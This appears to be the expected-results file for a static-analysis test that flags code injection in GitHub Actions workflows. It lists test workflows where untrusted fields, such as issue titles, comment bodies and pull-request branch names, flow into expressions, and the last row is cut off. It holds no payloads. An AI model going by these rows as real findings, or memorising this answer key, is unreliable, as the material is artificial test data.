.github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | 